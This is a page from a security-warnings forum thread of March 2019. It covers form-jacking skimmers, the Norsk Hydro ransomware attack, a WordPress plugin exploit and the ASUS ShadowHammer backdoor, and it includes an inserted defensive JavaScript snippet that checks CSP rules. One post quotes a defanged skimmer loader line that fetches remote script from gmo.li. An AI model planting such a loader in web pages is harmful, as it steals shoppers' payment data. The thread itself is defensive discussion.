Author Topic: SECURITY WARNINGS & Notices - Please post them here  (Read 1712038 times)


Offline polonus

« Reply #5851 on: March 16, 2019, 04:17:07 PM »
Many webshops fall victim to form-jacking
Think of the Magecart campaign and recently
https://www.group-ib.com/media/js-sniffer/
Quote
payment data of thousands of customers of UK and US online stores could have been compromised
Quote
It is loading the script from gmo.li using a jQuery getScript call, so a properly constructed CSP would have blocked it. Tested using one of my own CSP protected sites. See result here:


$.getScript('hxtp://gmo.li/js.php?r=008353')

Content Security Policy: The page’s settings blocked the loading of a resource at hxtp://gmo.li/js.php?r=008353&_=1552623429549 (“default-src”).


Implementing CSP on someone else's code would be really tough.
info credits go to foxonsafari.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
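
An added example, not part of any post in this thread: the observation quoted in Reply #5851 is that a policy with no script-src falls back to default-src, which is what blocked the getScript load from gmo.li. The sketch below is a simplified source-list matcher, not a full CSP implementation; the shop URL, the sample policy and all function names are assumptions made for illustration.

```javascript
// Added example: simplified CSP source-list check for script loads.
// Handles 'self', 'none', *, scheme-sources and host-sources (optional scheme,
// leading "*." wildcard). Ports/paths in sources, nonces and hashes are ignored.
const SHOP_PAGE = 'https://shop.example/checkout';   // constructed page URL
const SNIFFER_URL = 'hxtp://gmo.li/js.php?r=008353'; // defanged, as quoted in the post

function parsePolicy(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    // The first occurrence of a directive wins; later duplicates are ignored.
    if (name && !directives.has(name.toLowerCase())) {
      directives.set(name.toLowerCase(), sources);
    }
  }
  return directives;
}

function splitUrl(url) {
  const m = /^([a-z][a-z0-9+.-]*):\/\/([^\/:?#]+)(?::(\d+))?/i.exec(url);
  if (!m) throw new Error('unparseable URL: ' + url);
  return { scheme: m[1].toLowerCase(), host: m[2].toLowerCase(), port: m[3] || '' };
}

function sourceMatches(expr, target, self) {
  const e = expr.toLowerCase();
  if (e === '*') return true;
  if (e === "'self'") {
    return target.scheme === self.scheme && target.host === self.host && target.port === self.port;
  }
  if (e.startsWith("'")) return false; // 'none', nonces, hashes: no URL match
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return target.scheme + ':' === e; // scheme-source
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\/:]+)/.exec(e);
  if (!m || (m[1] && m[1] !== target.scheme)) return false;
  const host = m[2];
  return host.startsWith('*.') ? target.host.endsWith(host.slice(1)) : target.host === host;
}

function checkScriptLoad(header, pageUrl, scriptUrl) {
  const policy = parsePolicy(header);
  // script-src governs script loads; without it the browser falls back to default-src.
  const directive = ['script-src', 'default-src'].find((d) => policy.has(d)) || null;
  if (!directive) return { allowed: true, directive: null }; // nothing restricts scripts
  const target = splitUrl(scriptUrl), self = splitUrl(pageUrl);
  const allowed = policy.get(directive).some((s) => sourceMatches(s, target, self));
  return { allowed, directive };
}

console.log(checkScriptLoad("default-src 'self'", SHOP_PAGE, SNIFFER_URL));
```

A policy that names no script-src or default-src at all, or one whose script-src is `*`, lets the same load through, which is the gap a "properly constructed" policy closes.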

Offline polonus

« Reply #5852 on: March 19, 2019, 03:14:12 PM »
One of the biggest Aluminium producers hit by ransomware.
https://newsweb.oslobors.no/message/472389
Various factories inside EU and USA have been hit:
https://www.nrk.no/norge/hydro-utsatt-for-dataangrep_-_--ikke-opplevd-lignende-1.14479736
Norse Security Services are investigating:
https://twitter.com/NSM_no/status/1107945689491931137

polonus


Offline DavidR

« Reply #5854 on: March 19, 2019, 05:31:10 PM »
One of the biggest Aluminium producers hit by ransomware.
https://newsweb.oslobors.no/message/472389
Various factories inside EU and USA have been hit:
https://www.nrk.no/norge/hydro-utsatt-for-dataangrep_-_--ikke-opplevd-lignende-1.14479736
Norse Security Services are investigating:
https://twitter.com/NSM_no/status/1107945689491931137

polonus
In English   https://www.newsinenglish.no/2019/03/19/hydro-comes-under-major-cyber-attack/

If this does nothing else, it should show business has to isolate critical systems and have a robust backup and recovery strategy.  Assuming they have an IT department.
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 19.6.2383/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ WinPatrol+/

Offline polonus

« Reply #5855 on: March 22, 2019, 12:15:14 AM »
WordPress sites under attack via vulnerable plug-in: https://wordpress.org/plugins/easy-wp-smtp/#developers
Attacks ongoing since March 15th: https://blog.nintechnet.com/critical-0day-vulnerability-fixed-in-wordpress-easy-wp-smtp-plugin/
Update the plug-in in question: https://www.wordfence.com/blog/2019/03/hackers-abusing-recently-patched-vulnerability-in-easy-wp-smtp-plugin/

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)


Offline markspectrum-mgt.com

« Reply #5856 on: March 22, 2019, 12:44:31 AM »
Not sure if this is the correct thread but I am getting warnings on a few sites I manage:
hxxp://best-home-security-systems.com/
hxxps://homesecuritysystems-local.com/
hxxp://californiahomesecuritysystems.com/

The message:
Warning
This site could have harmed your computer
Get me out of here

Any info would be appreciated.

Offline bob3160

« Reply #5857 on: March 22, 2019, 12:51:54 AM »
Not sure if this is the correct thread but I am getting warnings on a few sites I manage:
hxxp://best-home-security-systems.com/
hxxps://homesecuritysystems-local.com/
hxxp://californiahomesecuritysystems.com/

The message:
Warning
This site could have harmed your computer
Get me out of here

Any info would be appreciated.
Report a URL
https://www.avast.com/report-a-url.php
Free avast! Security Seminar: https://goo.gl/kh3cqR  -  Important: http://www.organdonor.gov/ -- My Web Site: http://bob3160.strikingly.com/ - Win 10 Pro v1903 64bit, 8 Gig Ram, AvastFree 19.5.2378, How to Successfully Install Avast http://goo.gl/VLXdeRepair & Clean Install https://goo.gl/t7aJGq


Offline Pondus

« Reply #5859 on: March 26, 2019, 08:11:53 AM »
Can Avast detect this?
https://www.tomsguide.com/us/chinese-hackers-asus-kaspersky,news-29722.html
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
https://www.virustotal.com/#/file/bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19/detection



Kaspersky  https://securelist.com/operation-shadowhammer/89992/
Quote
We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack. To check this, it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found.



Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline bob3160

« Reply #5860 on: March 26, 2019, 02:17:52 PM »
Can Avast detect this?
https://www.tomsguide.com/us/chinese-hackers-asus-kaspersky,news-29722.html
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
https://www.virustotal.com/#/file/bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19/detection



Kaspersky  https://securelist.com/operation-shadowhammer/89992/
Quote
We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack. To check this, it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found.
The simple answer is Yes. I certainly wouldn't suggest downloading a tool from Kaspersky in light of the fact that Avast detects this malware. :)

Offline ehmen

« Reply #5861 on: March 26, 2019, 03:51:30 PM »
The simple answer is Yes. I certainly wouldn't suggest downloading a tool from Kaspersky in light of the fact that Avast detects this malware. :)
So if an Avast scan is done and the result is clean, it means the computer isn't infected or affected by any of this?

Offline bob3160

« Reply #5862 on: March 26, 2019, 03:59:52 PM »
Correct. :)

Offline Pondus

« Reply #5863 on: March 26, 2019, 04:30:02 PM »
Correct. :)
Partly correct

You can still have one of the network adapters listed; you may have one made by Asus even if not running an Asus computer.


« Last Edit: March 26, 2019, 04:33:16 PM by Pondus »


Offline ehmen

« Reply #5864 on: March 26, 2019, 06:22:37 PM »
You can still have one of the network adapters listed; you may have one made by Asus even if not running an Asus computer.
Please explain what you mean.